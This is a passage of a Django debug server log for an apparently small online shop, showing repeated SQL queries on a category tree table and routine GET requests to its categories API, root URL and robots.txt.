WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:51:55] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:53:45,719 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:53:45,727 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:53:45,731 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:53:45,736 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:53:45,740 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:53:45,744 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:53:45,748 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:53:45,752 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:53:45,756 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:53:45,760 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:53:45,764 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:53:45] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:53:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:58:16,939 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:58:16,944 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:58:16,948 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:58:16,950 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:58:16,952 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:58:16,955 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:58:16,957 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:58:16,959 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:58:16,962 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:58:16,964 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:58:16,966 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:58:16] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:59:09,217 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:59:09,223 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:59:09,226 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:59:09,229 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:59:09,232 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:59:09,234 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:59:09,236 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:59:09,238 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:59:09,240 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:59:09,242 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:59:09,245 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:59:09] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 09:00:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 09:06:10] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [13/Dec/2019 09:06:59] "GET /robots.txt HTTP/1.0" 404 6624 DEBUG 2019-12-13 09:08:53,297 utils 11259 139831317362432 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'resfx'; args=('resfx',) Not Found: /resfx/ [13/Dec/2019 09:08:53] "GET /resfx/ HTTP/1.0" 404 1727 [13/Dec/2019 09:11:12] "GET / HTTP/1.0" 302 0 [13/Dec/2019 09:16:15] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [13/Dec/2019 09:17:42] "GET /robots.txt HTTP/1.0" 404 6624 [13/Dec/2019 09:18:40] "GET / HTTP/1.0" 302 0 [13/Dec/2019 09:21:18] "GET / HTTP/1.0" 302 0 [13/Dec/2019 09:26:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 09:28:26,959 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:28:26,965 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:28:26,967 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:28:26,970 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:28:26,972 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:28:26,974 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:28:26,977 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:28:26,979 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:28:26,981 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:28:26,983 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:28:26,986 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:28:26] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:29:08,029 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:29:08,034 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:29:08,037 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:29:08,039 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:29:08,041 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:29:08,043 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:29:08,045 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:29:08,048 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:29:08,050 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:29:08,052 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:29:08,055 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:29:08] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:29:17,142 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:29:17,150 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:29:17,154 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:29:17,158 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:29:17,162 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:29:17,166 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:29:17,170 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:29:17,175 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:29:17,179 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, 